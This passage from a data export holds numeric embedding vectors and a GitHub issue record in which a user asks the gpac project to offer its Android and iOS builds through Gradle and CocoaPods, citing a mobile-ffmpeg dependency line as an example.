-0.002206861972808838, -0.00394030474126339, -0.004231639672070742, 0.009767002426087856, 0.013860258273780346, 0.008667212910950184, 0.008186510764062405, 0.010968758724629879, -0.010189438238739967, -0.008018992841243744, -0.014763396233320236, -0.005273161921650171, 0.017713163048028946, 0.007822342216968536, 0.0014530328335240483, -0.028813021257519722, -0.0022906207013875246, 0.00024922791635617614, 0.023408759385347366, 0.01125281024724245, 0.014515761286020279, -0.024064263328909874, -0.027603982016444206, -0.027065012603998184, -0.019315503537654877, -0.011485878378152847, 0.0010478951735422015, 0.004009496420621872, 0.0015823127469047904, -0.005127494223415852, 0.010662857443094254, 0.004894426558166742, -0.00007675991946598515, 0.005127494223415852, 0.03580506145954132, 0.0211800467222929, -0.009024098515510559, -0.01780056208372116, 0.005684672389179468, 0.015877751633524895, -0.0015968794468790293, -0.014887213706970215, 0.027807917445898056, 0.027370914816856384, -0.022228853777050972, 0.01074297446757555, -0.013911241665482521, 0.010029204189777374, 0.0048143090680241585, 0.013146487064659595, 0.004329964984208345, -0.0020338818430900574, -0.0073562064208090305, 0.00001638758840272203, -0.022389087826013565, 0.006908278912305832, 0.012141382321715355, -0.017276160418987274, -0.02008754201233387, 0.025418970733880997, -0.011456744745373726, 0.02377292886376381, 0.00242172135040164, 0.012760468758642673, 0.00411874707788229, 0.007552857510745525, 0.0029443034436553717, 0.021194614470005035, 0.006660644430667162, -0.0021376698277890682, 0.005917740054428577, -0.005881323479115963, -0.008565246127545834, 0.006169016472995281, 0.013452389277517796, 0.01691199094057083, -0.013066370040178299, 0.014712412841618061, 0.008259344846010208, -0.010823091492056847, -0.005371487233787775, -0.003111820900812745, -0.004504765849560499, -0.0017316217999905348, -0.009286300279200077, -0.006777178030461073, 0.0038019204512238503, -0.02394772879779339, 0.00047205359442159534, 0.014253560453653336, 0.0013656324008479714, -0.0056701055727899075, 0.0024872717913240194, -0.00037327283644117415, -0.022942623123526573, 0.02240365371108055, 0.020422575995326042, 0.018193865194916725, 0.003954871091991663, 0.0026274765841662884, 0.0026529685128480196, -0.005171194672584534, 0.0020411652512848377, -0.0060706911608576775, 0.01088135875761509, -0.03382398188114166, -0.010167588479816914, 0.017247026786208153, 0.00662422738969326, -0.0032228922937065363, 0.009737868793308735, -0.011704379692673683, -0.004614016506820917, 0.0019410187378525734, 0.00888571422547102, -0.009177049621939659, 0.004639508202672005, 0.025331569835543633, -0.003326680511236191, -0.0005544467130675912, 0.010662857443094254, 0.02346702665090561, -0.01596515253186226, 0.007177763618528843, 0.031027168035507202, 0.007807775400578976, 0.004679566714912653, -0.009366417303681374, 0.008295761421322823, -0.0063620260916650295, -0.012789602391421795, -0.003111820900812745, 0.009220750071108341, -0.008033559657633305, -0.020641077309846878, 0.011245527304708958, 0.01729072630405426, 0.011427612043917179, 0.006999321281909943, -0.029585059732198715, -0.0015031059738248587, 0.014056908898055553, 0.009351850487291813, 0.004832517821341753, 0.007509157061576843, -0.01267306786030531, -0.012250632978975773, 0.011172693222761154, 0.0198544729501009, -0.0074654570780694485, -0.001937377150170505, -0.0020739403553307056, -0.010072904638946056, -0.021427681669592857, -0.007367131300270557, -0.01333585474640131, 0.00029474898474290967, 0.017450960353016853, -0.002516405191272497, -0.0015340603422373533, 0.018951335921883583, -0.0029351990669965744, 0.006911920383572578, -0.025258736684918404, -0.01268763467669487, 0.015979720279574394, -0.01780056208372116, -0.0008903922862373292, -0.001882751821540296, -0.0017425469122827053, -0.013168337754905224, 0.0143919438123703, 0.017247026786208153, 0.01800449751317501, -0.000899951730389148, -0.023277658969163895, 0.008157377131283283, 0.01988360658288002, 0.015673818066716194, 0.01780056208372116, -0.011369344778358936, 0.01557185035198927, 0.005619122181087732, 0.0005603644531220198, -0.01557185035198927, 0.001494001829996705, 0.006190866697579622, 0.019242670387029648, -0.011966581456363201, 0.02957049198448658, 0.00864536315202713, -0.014384660869836807, -0.014661429449915886, 0.023860327899456024, 0.011660679243505001, 0.0007697614491917193, -0.008623513393104076, -0.0020903279073536396, 0.001629654667340219, -0.006890070624649525, -0.021719016134738922, -0.020509976893663406, 0.004300831351429224, 0.01568838395178318, 0.008412295021116734, 0.015397049486637115, 0.02100524678826332, 0.004217072855681181, 0.008703630417585373, -0.006056124344468117, 0.027400048449635506, 0.0217918511480093, 0.0028896781150251627, 0.021223748102784157, -0.0030845082364976406, -0.005196686368435621, 0.0033048302866518497, 0.00452661607414484, 0.006638794206082821, 0.017844263464212418, 0.022491054609417915, -0.015367915853857994, -0.000759291579015553, 0.01715962588787079, -0.0042207143269479275, 0.01606711931526661, 0.0016715340316295624, -0.010320538654923439, 0.0027221604250371456, 0.00758927408605814, 0.01072840765118599, 0.006372950971126556, -0.0029060656670480967, 0.029614193364977837, -0.0012381733395159245, -0.025054801255464554, -0.013059087097644806, 0.020815879106521606, 0.005721088964492083, -0.024981968104839325, 0.009016815572977066, 0.009970936924219131, -0.02039344236254692, -0.010218571871519089, 0.00012518296716734767, -0.00031022613984532654, -0.005200327839702368, -0.021733583882451057, 0.004329964984208345, 0.010276839137077332, 0.010036487132310867, 0.0022887997329235077, -0.005531721282750368, -0.0010688349138945341, -0.018324965611100197, -0.009388267062604427, -0.0007870594272390008, -0.003889320883899927, -0.00046613585436716676, -0.018645433709025383, -0.02247648872435093, -0.02605990692973137, 0.014348244294524193, -0.008652647025883198, 0.013860258273780346, -0.004016779828816652, 0.006110749673098326, -0.011194543913006783, -0.0023452460300177336, -0.008994964882731438, 0.01739269308745861, -0.01557185035198927, 0.013124637305736542, -0.0401168167591095, 0.014355527237057686, 0.008834730833768845, 0.010291405022144318, 0.008077260106801987, -0.008106393739581108, 0.0016023420030251145, -0.005495304707437754, -0.020451709628105164, 0.009868970140814781, 0.004184297751635313, -0.0141880102455616, -0.008929414674639702, -0.0043190401047468185, -0.009876253083348274, 0.01756749488413334, -0.003703594906255603, 0.012002998031675816, 0.017028525471687317, 0.0032647717744112015, -0.006405726075172424, -0.00016808658256195486, 0.0058849649503827095, 0.010051053948700428, 0.02949765883386135, -0.01736355945467949, 0.00242172135040164, 0.010269555263221264, 0.0005685582873411477, -0.017174191772937775, -0.011085293255746365, 0.0009268091525882483, 0.005950515624135733, -0.006860936991870403, -0.01125281024724245, 0.0016870112158358097, 0.0027057728730142117, -0.004639508202672005, 0.024850867688655853, 0.026526043191552162, 0.01746552810072899, -0.012804169207811356, -0.0038128455635160208, -0.013168337754905224, 0.013947658240795135, -0.008842014707624912, -0.006926487199962139, -0.00953393429517746, -0.020961545407772064, 0.041107356548309326, -0.012483700178563595, -0.003783712163567543, -0.013408688828349113, -0.013212038204073906, 0.012308899313211441, 0.011114426888525486, -0.021704450249671936, 0.019286369904875755, 0.016722623258829117, -0.0019155270420014858, 0.004461065866053104, 0.003364918055012822, 0.024821734055876732, -0.00890028104186058, -0.00004893515870207921, 0.004475632682442665, 0.008703630417585373, -0.005473454482853413, 0.01415159273892641, 0.01749466173350811, 0.008980398066341877, -0.018645433709025383, -0.00927901640534401, 0.004734192043542862, 0.004140597302466631, -0.011675246059894562, -0.010961475782096386, -0.022665856406092644, -0.020072974264621735, -0.00016774518007878214, -0.02026234194636345, -0.001202666899189353, 0.008142810314893723, -0.019155269488692284, -0.006398442666977644, -0.0034978396724909544, -0.028944123536348343, 0.006551393773406744, 0.02110721357166767, -0.003987646661698818, -0.0008826536941342056, 0.007134063635021448, -0.01609625294804573, -0.01647498831152916, 0.046438783407211304, 0.023612694814801216, 0.0022196078207343817, 0.012403583154082298, -0.004340889863669872, 0.0071194968186318874, 0.0016669818433001637, 0.0029989287722855806, -0.014828946441411972, -0.004424648825079203, -0.00726516405120492, -0.0067079863511025906, 0.0036125527694821358, 0.009118782356381416, -0.011726229451596737, -0.010167588479816914, 0.0018663642695173621, -0.009228033013641834, -0.004424648825079203, -0.014093326404690742, 0.0141880102455616, 0.0017689490923658013, 0.01137662772089243, -0.023204825818538666, -0.004158805590122938, 0.006249133497476578, 0.005513512995094061, -0.02906065620481968, -0.01831039786338806, -0.0003566576633602381, 0.008587095886468887, -0.011507729068398476, -0.014078759588301182, -0.005881323479115963, 0.02196665108203888, -0.006482201628386974, -0.004799742717295885, 0.013583489693701267, -0.012287049554288387, -0.020247776061296463, -0.0157175175845623, -0.005040093790739775, 0.011507729068398476, -0.00774222519248724, -0.011398478411138058, 0.0056701055727899075, -0.029439391568303108, 0.020553678274154663, 0.019650539383292198, 0.008354028686881065, 0.0004711431683972478, 0.01790253072977066, 0.0005626405472867191, 0.020306043326854706, 0.004293547943234444, 0.002569209784269333, 0.003991288132965565, -0.008732764050364494, -0.022636722773313522, -0.02176271751523018, 0.00002226265314675402, 0.006930129136890173, -0.019344637170433998, -0.026409508660435677, -0.01691199094057083, 0.005007318686693907, 0.010313255712389946, 0.0022869789972901344, -0.004981826990842819, 0.011551428586244583, -0.0211800467222929, -0.00789517629891634, -0.01579035259783268, -0.020932413637638092, 0.006930129136890173, -0.02705044485628605, -0.0010114783653989434, -0.006194508168846369, 0.009453817270696163, -0.0026602519210428, -0.019767073914408684, -0.029104357585310936, 0.007414473220705986, 0.005229461472481489, 0.01899503543972969, 0.004300831351429224, -0.006198150105774403, -0.012964403256773949, -0.0018326786812394857, -0.0020411652512848377, 0.03423185274004936, 0.01219236571341753, -0.011740796267986298, -0.006755328271538019, 0.02476346679031849, -0.023831194266676903, 0.001508568529970944, 0.019126135855913162, -0.0074108317494392395, 0.019898174330592155, 0.008018992841243744, -0.0035561067052185535, -0.021646182984113693, -0.011616979725658894, -0.00604519946500659, -0.015309649519622326, 0.020320609211921692, -0.014093326404690742, -0.010087471455335617, -0.004901709966361523, -0.004858009517192841, -0.00888571422547102, -0.016139954328536987, -0.001194473123177886, 0.015426183119416237, 0.0014302722411230206, 0.02571030519902706, 0.0034395726397633553, 0.004249847959727049, 0.006169016472995281, -0.010539039969444275, -0.0010433431016281247, 0.00427169818431139, -0.008448712527751923, -0.02189381793141365, 0.013306722044944763, 0.013212038204073906, 0.031668104231357574, 0.0141880102455616, -0.013554356060922146, 0.000020626739569706842, 0.010386088863015175, 0.021675316616892815, 0.007421756628900766, 0.0005462529370561242, -0.014807096682488918, -0.010539039969444275, 0.013547073118388653, 0.010568173602223396, 0.018368665128946304, 0.00959948543459177, 0.04139868915081024, 0.008834730833768845, -0.008281194604933262, -0.011551428586244583, 0.010320538654923439, -0.012396300211548805, -0.0016342067392542958, -0.008856581524014473, -0.009235316887497902, 0.0016487734392285347, 0.022796956822276115, -0.0052148946560919285, -0.010415222495794296, 0.013379555195569992, 0.021733583882451057, 0.010626440867781639, 0.008892998099327087, -0.007421756628900766, 0.013947658240795135, -0.006460351403802633, 0.032483842223882675, -0.004573957994580269, -0.023743795230984688, -0.009657751768827438, 0.009366417303681374, -0.00009314750786870718, -0.0062090749852359295, 0.028011851012706757, -0.007640257943421602, -0.037057798355817795, -0.015222248621284962, 0.009577634744346142, 0.0019992857705801725, 0.010852225124835968, 0.017247026786208153, 0.011740796267986298, 0.012862435542047024, 0.0011070726905018091, 0.005032810382544994, 0.021777283400297165, 0.005684672389179468, -0.017887962982058525, 0.0005471633630804718, 0.006143524777144194, 0.0062309252098202705, 0.018135597929358482, -0.0019464812939986587, -0.002168624196201563, 0.005356920417398214, 0.0006996589945629239, -0.01609625294804573, 0.006052482407540083, -0.0009222570806741714, -0.0024526757188141346, 0.020932413637638092, 0.014960046857595444, 0.00005505205626832321, 0.013015386648476124, 0.0035306147765368223, 0.019228104501962662, -0.0043190401047468185, 0.014909063465893269, 0.0013437822926789522 ]
254
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I just want to thank you for your open source project, it is awesome! One more thing I want to add: Migrate the Android/iOS integration to Gradle/PODs. It is very **hard** to get a successful .so files and create wrappers. FFMPEG has one project with gradle integration for Android and iOS, You should do the same. Gradle file: ``` dependencies { implementation 'com.arthenica:mobile-ffmpeg-full-gpl:4.4.LTS' } ``` Same with iOS project by including PODs
[FEATURE REQUEST] Migration to Gradle/POD
https://api.github.com/repos/gpac/gpac/issues/1708/comments
1
2021-03-15T10:30:41
2021-03-17T16:17:36Z
https://github.com/gpac/gpac/issues/1708
831,667,839
1,708
false
This is a GitHub Issue repo:gpac owner:gpac Title : [FEATURE REQUEST] Migration to Gradle/POD Issue date: --- start body --- I just want to thank you for your open source project, it is awesome! One more thing I want to add: Migrate the Android/iOS integration to Gradle/PODs. It is very **hard** to get a successful .so files and create wrappers. FFMPEG has one project with gradle integration for Android and iOS, You should do the same. Gradle file: ``` dependencies { implementation 'com.arthenica:mobile-ffmpeg-full-gpl:4.4.LTS' } ``` Same with iOS project by including PODs --- end body ---
614
[ -0.034331269562244415, 0.02577846311032772, -0.03157036378979683, -0.009055472910404205, -0.006958534475415945, 0.0065984162501990795, -0.004970381502062082, 0.050386540591716766, -0.02496819570660591, 0.046365220099687576, 0.005964457988739014, -0.017750827595591545, 0.041713692247867584, 0.03172041475772858, -0.019656453281641006, 0.011111147701740265, -0.011996437795460224, -0.022297319024801254, -0.03973304480314255, -0.0038318829610943794, 0.008470281027257442, -0.06143016740679741, 0.03172041475772858, 0.0053642611019313335, 0.01683552749454975, -0.010706014931201935, -0.017225654795765877, 0.019896531477570534, -0.04948624595999718, 0.012604137882590294, 0.022297319024801254, 0.011148659512400627, -0.002541459398344159, 0.006774723995476961, 0.04060332849621773, 0.008800389245152473, 0.03457134962081909, 0.04120352491736412, 0.004827834665775299, 0.0029503435362130404, -0.021051911637187004, -0.019431378692388535, 0.009850733913481236, 0.025598403066396713, -0.008590320125222206, 0.037602342665195465, 0.019491398707032204, 0.025538383051753044, -0.02169712260365486, 0.008425265550613403, 0.011111147701740265, -0.03580175340175629, -0.007997625507414341, -0.018816176801919937, -0.024698108434677124, -0.015297521837055683, 0.032860785722732544, -0.057858992367982864, -0.005315495189279318, 0.014217167161405087, -0.01848606951534748, 0.04360431432723999, -0.020451713353395462, 0.007292394060641527, 0.014584788121283054, 0.01626534014940262, -0.033581022173166275, 0.04906610772013664, -0.01455477811396122, 0.026723772287368774, 0.005900687072426081, -0.03541162610054016, -0.01123868953436613, 0.005679364316165447, 0.016190314665436745, -0.04372435435652733, 0.0321105420589447, 0.014112132601439953, -0.019536413252353668, 0.003608684753999114, -0.057889003306627274, 0.0017077481606975198, -0.05683865770697594, -0.0055330665782094, -0.000196001841686666, -0.0060807461850345135, -0.019836511462926865, -0.07736539840698242, -0.03766236454248428, -0.0019712720531970263, -0.024638088420033455, -0.0014967413153499365, 0.021201960742473602, -0.013114305213093758, 0.025733448565006256, 0.011111147701740265, -0.018185969442129135, -0.005172948352992535, -0.030505014583468437, -0.039102837443351746, -0.0069847931154072285, -0.0064108544029295444, 0.0005096985842101276, -0.00282467738725245, -0.004737805109471083, 0.003571172244846821, 0.020001566037535667, 0.005157943349331617, -0.015560108236968517, 0.04036325216293335, 0.02985980175435543, 0.02661873772740364, 0.017780836671590805, 0.006590913515537977, 0.0186961367726326, 0.01889120228588581, -0.01941637322306633, -0.040723368525505066, -0.023362670093774796, -0.017465732991695404, 0.02783413790166378, -0.004283906426280737, -0.02399287559092045, -0.00040794641245156527, -0.026978855952620506, 0.005705622956156731, -0.011306211352348328, 0.014697324484586716, -0.004786571487784386, 0.009325561113655567, -0.04672534018754959, 0.007742541842162609, 0.016415389254689217, -0.0405132994055748, 0.056118421256542206, 0.003563669975847006, 0.0035261574666947126, 0.05887933075428009, -0.01733068935573101, -0.000806983676739037, 0.023827822878956795, -0.04267400875687599, 0.01399209350347519, -0.02459307387471199, 0.009573142975568771, 0.0009809470502659678, 0.017000580206513405, 0.01571015827357769, 0.02453305386006832, -0.006710953079164028, 0.0009706311393529177, -0.03133028373122215, 0.053687624633312225, -0.01407462079077959, 0.016280343756079674, 0.00471529783681035, -0.009138000197708607, 0.015199990011751652, -0.008102660067379475, 0.019941546022892, 0.00871035922318697, 0.00964816752821207, 0.004227637778967619, -0.019746482372283936, -0.042433928698301315, -0.06332078576087952, 0.027849141508340836, 0.027188925072550774, -0.032680727541446686, 0.020811831578612328, 0.024788137525320053, -0.010901078581809998, 0.021216964349150658, -0.01664046198129654, -0.04927617684006691, -0.01767580211162567, 0.037632353603839874, 0.03451132774353027, -0.01156129501760006, -0.04600510373711586, -0.02300255186855793, -0.0019112523877993226, 0.014614798128604889, 0.0072586326859891415, 0.024097910150885582, -0.019551418721675873, 0.05020648241043091, -0.015560108236968517, 0.025103241205215454, -0.01605527102947235, 0.03577174246311188, 0.002623986452817917, 0.017690807580947876, 0.005855672527104616, 0.05482799932360649, -0.047175485640764236, -0.002991607179865241, 0.01664046198129654, -0.011321216821670532, 0.011073634959757328, -0.03502149507403374, -0.032680727541446686, 0.0004313916142564267, 0.005251724272966385, -0.01327935978770256, -0.009438098408281803, 0.011726349592208862, 0.04042327031493187, 0.014442240819334984, -0.056088414043188095, -0.029559703543782234, 0.004546492360532284, -0.001603651442565024, -0.013481926172971725, 0.011336221359670162, 0.0193263441324234, 0.02343769371509552, -0.029274610802531242, -0.014584788121283054, 0.008425265550613403, 0.004704044200479984, 0.009925758466124535, -0.02141202986240387, -0.005236719269305468, 0.003946295473724604, 0.009588147513568401, 0.003021616954356432, -0.006804734002798796, 0.019101271405816078, 0.021922197192907333, 0.05254724994301796, 0.0029165823943912983, -0.03577174246311188, -0.014794857241213322, 0.00764500955119729, 0.002659623045474291, 0.010630990378558636, -0.01109614223241806, 0.010713516734540462, 0.040843408554792404, -0.02748902328312397, -0.0038562659174203873, -0.04186374321579933, -0.024413013830780983, 0.01883118227124214, 0.044924747198820114, -0.018125951290130615, 0.07064319401979446, -0.021967211738228798, 0.010683507658541203, 0.0213520098477602, -0.013459418900310993, -0.011201176792383194, 0.019896531477570534, -0.029994847252964973, 0.012521610595285892, 0.005889433436095715, 0.03655200079083443, -0.019806502386927605, -0.030054867267608643, -0.012386566027998924, -0.021802157163619995, 0.013812034390866756, 0.0003247159766033292, -0.006748465355485678, -0.026873821392655373, 0.007449945900589228, 0.013834541663527489, -0.010083310306072235, -0.00813267007470131, -0.027008866891264915, -0.03064005821943283, -0.04183373227715492, 0.030820118263363838, -0.023602748289704323, -0.012679162435233593, 0.01536504365503788, 0.010045797564089298, 0.05746886506676674, 0.046365220099687576, -0.014172152616083622, -0.006988544017076492, 0.04036325216293335, 0.025583399459719658, -0.009325561113655567, -0.004970381502062082, -0.026888826861977577, -0.030970167368650436, -0.023737791925668716, 0.027594057843089104, 0.020466718822717667, -0.000512980914209038, -0.0010456558084115386, 0.017930885776877403, 0.01617530919611454, 0.014052112586796284, 0.0015004925662651658, 0.006185780744999647, -0.006114507094025612, -0.00004861947672907263, -0.0014845498371869326, -0.0020200381986796856, 0.01692555658519268, -0.006977290380746126, -0.004850342404097319, 0.016325360164046288, -0.0028152992017567158, 0.02193720079958439, -0.004471467807888985, 0.005596837494522333, 0.074184350669384, -0.016355369240045547, -0.009775709360837936, 0.015034935437142849, -0.0034098695032298565, 0.024848157539963722, 0.0058144088834524155, -0.01788587123155594, -0.015635132789611816, -0.03808250278234482, -0.015425063669681549, 0.024142926558852196, -0.0632607638835907, -0.014442240819334984, 0.013999596238136292, 0.016820522025227547, -0.006332078482955694, -0.004175120498985052, -0.022372344508767128, 0.019026245921850204, 0.06272058933973312, -0.02144203893840313, 0.05887933075428009, -0.028749438002705574, 0.014097128063440323, -0.016250334680080414, 0.002168211853131652, -0.035921793431043625, 0.04837588220834732, 0.002785289427265525, 0.013361886143684387, 0.05083668977022171, 0.029754767194390297, -0.006632177159190178, -0.035201556980609894, -0.020496727898716927, 0.005195455625653267, 0.0498763732612133, 0.018786167725920677, 0.01034589670598507, 0.000882008287589997, -0.01742071844637394, 0.016775507479906082, -0.007990122772753239, 0.008035138249397278, 0.03208053112030029, 0.02499820664525032, -0.04672534018754959, -0.003683709306642413, -0.010105817578732967, -0.0007976056076586246, -0.03742228448390961, -0.0014686071081086993, 0.02574845217168331, 0.022012226283550262, 0.03859267011284828, -0.043244197964668274, -0.020931871607899666, 0.006508386693894863, -0.05251723900437355, 0.001862486475147307, 0.000007242367701110197, -0.017930885776877403, 0.007524970453232527, -0.04915613681077957, 0.010653497651219368, 0.00735616497695446, 0.013414403423666954, -0.033551014959812164, 0.03970303386449814, -0.01453977357596159, 0.010961098596453667, -0.002954094670712948, -0.03568171337246895, 0.01652042381465435, 0.01131371408700943, 0.009745699353516102, 0.0014779851771891117, -0.0442645326256752, -0.020616767928004265, -0.02184717170894146, -0.004092593677341938, -0.0051616947166621685, -0.05482799932360649, -0.0582791306078434, 0.02453305386006832, -0.012304038740694523, -0.02303256094455719, -0.025673428550362587, 0.00042295135790482163, 0.006688445806503296, -0.009753202088177204, 0.015425063669681549, 0.06113006919622421, -0.009888245724141598, 0.006155770737677813, -0.01857609860599041, -0.023182610049843788, 0.011268699541687965, -0.012791699729859829, -0.05311743915081024, -0.0101283248513937, -0.05488801747560501, -0.0033929888159036636, 0.029964836314320564, 0.03385111317038536, -0.012289034202694893, 0.03067006915807724, -0.015905221924185753, 0.03742228448390961, 0.018531084060668945, 0.0009987653465941548, -0.010871068574488163, 0.005593086127191782, -0.00373622658662498, 0.017090611159801483, 0.025733448565006256, -0.0026614987291395664, 0.0012538491282612085, -0.016130294650793076, 0.012454088777303696, -0.025133250281214714, 0.021952206268906593, -0.016370374709367752, 0.016220325604081154, 0.01565013825893402, -0.010803546756505966, -0.02624361589550972, -0.035891782492399216, 0.022807486355304718, -0.0532974973320961, -0.02352772280573845, 0.010420921258628368, 0.0014029605081304908, -0.020301664248108864, -0.06146017462015152, -0.04501477628946304, -0.02091686613857746, 0.00847778283059597, -0.04711546748876572, 0.015815190970897675, 0.04099345579743385, -0.02169712260365486, -0.024803142994642258, -0.009903251193463802, -0.018711142241954803, -0.018321014940738678, 0.04042327031493187, 0.0476856529712677, -0.03175042197108269, 0.019431378692388535, 0.012709172442555428, -0.008987950161099434, 0.034271251410245895, 0.009558137506246567, -0.02589850127696991, -0.01748073846101761, -0.036011822521686554, 0.0056943693198263645, 0.028509359806776047, 0.008065147325396538, 0.05020648241043091, 0.04060332849621773, 0.001574579393491149, -0.037092175334692, 0.035051506012678146, 0.006774723995476961, -0.056178443133831024, 0.0221322663128376, -0.025988532230257988, -0.027218936011195183, -0.01354194525629282, 0.011283704079687595, -0.008260211907327175, -0.023632757365703583, -0.022342335432767868, -0.006384595762938261, 0.024007881060242653, -0.0036368188448250294, 0.030655063688755035, 0.015725161880254745, 0.011478768661618233, 0.01707560569047928, 0.009865738451480865, 0.015590118244290352, -0.030219919979572296, 0.008650340139865875, 0.004745307844132185, 0.05248723179101944, -0.0027665332891047, -0.040663350373506546, 0.014734837226569653, 0.01892121136188507, -0.02841932885348797, 0.008200191892683506, 0.033581022173166275, -0.01695556566119194, 0.05014646053314209, 0.001816533855162561, 0.017345694825053215, -0.0038037486374378204, 0.028284285217523575, -0.014772349037230015, -0.030129890888929367, 0.017630787566304207, -0.036161869764328, -0.0054355342872440815, -0.0008918552775867283, 0.003580550430342555, -0.0031379051506519318, 0.006647182162851095, -0.005266728810966015, -0.010668502189218998, -0.008012630045413971, -0.01689554564654827, 0.027008866891264915, 0.004824083764106035, -0.02297254092991352, 0.0523671917617321, -0.007041061297059059, 0.0006911644013598561, 0.0013016773154959083, -0.02187718264758587, 0.016385378316044807, -0.014239674434065819, 0.015725161880254745, 0.01258913241326809, 0.011921413242816925, -0.009423093870282173, 0.024758128449320793, -0.019011240452528, 0.02780412696301937, -0.03718220442533493, -0.005356758367270231, -0.027714097872376442, 0.012536615133285522, -0.01045843306928873, -0.011276201345026493, -0.011553793214261532, 0.029034530743956566, -0.02936463989317417, -0.006264556664973497, 0.007386174518615007, 0.027504028752446175, -0.0003427687624935061, -0.006508386693894863, -0.004940371960401535, -0.0006348959286697209, -0.0032560687977820635, -0.03289079666137695, 0.0001856859598774463, 0.016385378316044807, 0.01257412787526846, -0.049576275050640106, 0.008672847412526608, -0.005461792927235365, 0.01488488633185625, -0.006448366679251194, -0.007311149965971708, -0.02210225537419319, 0.026078561320900917, -0.0013926447136327624, 0.0207218024879694, -0.00018767880101222545, -0.007367418613284826, 0.004640273284167051, 0.015500088222324848, 0.005990716628730297, -0.029994847252964973, -0.04588506370782852, -0.03808250278234482, 0.006579659879207611, -0.039342913776636124, 0.016070276498794556, 0.03493146598339081, 0.005668110679835081, -0.004629019647836685, -0.02250738814473152, -0.01472733449190855, -0.02493818663060665, 0.013571955263614655, -0.015605122782289982, 0.006354586221277714, -0.03145032376050949, 0.02627362497150898, -0.0038018731866031885, 0.018035920336842537, 0.017555763944983482, -0.00048015761421993375, -0.020466718822717667, -0.036762069910764694, 0.02294253185391426, -0.011013615876436234, -0.024037891998887062, -0.028854472562670708, 0.001263227197341621, -0.005589334759861231, 0.0067259580828249454, -0.014929900877177715, 0.01695556566119194, 0.0008670033421367407, 0.04462464898824692, 0.04702543839812279, -0.006257053930312395, 0.017285674810409546, 0.012949250638484955, 0.016880542039871216, 0.013001767918467522, 0.013399398885667324, 0.0022338582202792168, 0.00716110086068511, -0.003668704302981496, 0.0009274919866584241, -0.003961300477385521, 0.01785586215555668, 0.06001970171928406, 0.020391693338751793, -0.008492788299918175, -0.0033010835759341717, -0.004077588673681021, -0.050656627863645554, 0.0068572512827813625, -0.031120216473937035, -0.00829022191464901, -0.0744844526052475, -0.015995251014828682, -0.003775614546611905, -0.0046365219168365, -0.03493146598339081, 0.01393207348883152, -0.0020500479731708765, -0.021562078967690468, -0.03880273923277855, 0.03685209900140762, -0.014899891801178455, -0.003177293110638857, 0.00931805931031704, -0.01608528010547161, 0.024458028376102448, 0.023692777380347252, -0.015207492746412754, -0.025013212114572525, 0.006891012191772461, 0.01704559661448002, 0.01805092580616474, -0.02988981269299984, 0.004812830127775669, 0.026873821392655373, -0.01655043289065361, -0.03313087671995163, -0.0013513811863958836, -0.006358337122946978, -0.011943920515477657, -0.0108335567638278, 0.006545898970216513, -0.010158334858715534, -0.004767815116792917, -0.03535160422325134, -0.00743494089692831, 0.00902546290308237, 0.030625052750110626, -0.010713516734540462, 0.006005721632391214, -0.02340768463909626, -0.007292394060641527, -0.01895122043788433, 0.003839385462924838, -0.003569296794012189, -0.004325170069932938, -0.00727738905698061, 0.005214211530983448, -0.0013307493645697832, 0.022987546399235725, -0.00901045836508274, -0.025298304855823517, 0.007401179522275925, -0.014952408149838448, -0.05098673701286316, -0.01701558567583561, 0.005578081123530865, 0.014877383597195148, -0.020211635157465935, -0.01399209350347519, 0.028854472562670708, -0.016445398330688477, -0.0094305956736207, 0.03382110223174095, 0.025328313931822777, -0.004197627771645784, -0.0057581402361392975, -0.01327935978770256, -0.009303053840994835, -0.01608528010547161, -0.04663531109690666, 0.017900876700878143, -0.00533800246194005, 0.018125951290130615, -0.003021616954356432, -0.028539368882775307, 0.0096631720662117, 0.005585583858191967, 0.009228029288351536, -0.02979978360235691, 0.02736898511648178, -0.02210225537419319, 0.0002346864202991128, -0.017135625705122948, -0.028044207021594048, -0.029004521667957306, 0.01109614223241806, -0.011433753184974194, -0.023587742820382118, -0.03697213903069496, -0.008282719179987907, -0.00042013791971839964, -0.002046296838670969, -0.008410261012613773, -0.0064783766865730286, -0.007847576402127743, 0.001855921815149486, -0.013339378871023655, -0.023947861045598984, 0.019596433266997337, 0.011996437795460224, -0.0037437290884554386, -0.02300255186855793, 0.008470281027257442, 0.01883118227124214, 0.0039913104847073555, 0.014772349037230015, -0.00434767734259367, 0.008065147325396538, -0.017465732991695404, -0.03619188070297241, 0.010368403978645802, -0.008702857419848442, 0.017555763944983482, 0.01580018736422062, -0.05257726088166237, 0.006688445806503296, 0.022207289934158325, -0.009693182073533535, 0.0005265790969133377, -0.0557883158326149, -0.003085387870669365, 0.016505418345332146, -0.00019553293532226235, -0.012881728820502758, -0.006193283013999462, 0.023887841030955315, 0.012056457810103893, -0.0062120393849909306, -0.02792416699230671, 0.0038525147829204798, 0.025253290310502052, 0.02589850127696991, 0.008500290103256702, -0.006463371682912111, 0.014952408149838448, -0.022807486355304718, 0.0027777869254350662, -0.017375703901052475, -0.012244019657373428, 0.004306413698941469, 0.010045797564089298, 0.024668097496032715, -0.021171949803829193, -0.008410261012613773, -0.008545305579900742, -0.008837901055812836, -0.020451713353395462, -0.022012226283550262, -0.023212620988488197, 0.02621360495686531, 0.026018541306257248, -0.04702543839812279, 0.024232955649495125, 0.01842604950070381, -0.012521610595285892, 0.003297332441434264, 0.014974916353821754, 0.00006816691166022792, 0.02994983270764351, -0.03661201894283295, 0.04735554754734039, 0.0011281828628852963, 0.03544163331389427, 0.018471064046025276, -0.019926542416214943, -0.021276984363794327, 0.0012379063991829753, -0.006500883959233761, -0.018321014940738678, -0.0013804531190544367, -0.009168009273707867, 0.02271745726466179, -0.016880542039871216, 0.029439665377140045, -0.05158693343400955, 0.01536504365503788, -0.018501073122024536, -0.020391693338751793, 0.0033310935832560062, -0.010330891236662865, -0.004047578666359186, -0.004272652789950371, 0.019716473296284676, -0.02832929976284504, -0.011283704079687595, 0.05107676610350609, -0.020781822502613068, 0.024893172085285187, 0.04597509279847145, 0.008357743732631207, 0.01938636414706707, -0.020811831578612328, 0.0025677180383354425, 0.015079950913786888, 0.03886275738477707, 0.03667203709483147, 0.006718455348163843, 0.008470281027257442, -0.007172354497015476, -0.005281733814626932, -0.016760502010583878, 0.022822491824626923, 0.014487256295979023, 0.005634349770843983, -0.01686553657054901, 0.04708545655012131, -0.027008866891264915, -0.006729709450155497, -0.0346013605594635, -0.04504478722810745, -0.010683507658541203, -0.02465309388935566, -0.01228153146803379, -0.03694212809205055, 0.008155177347362041, 0.0201066005975008, 0.027293959632515907, -0.010773536749184132, 0.03154035285115242, 0.04759562388062477, 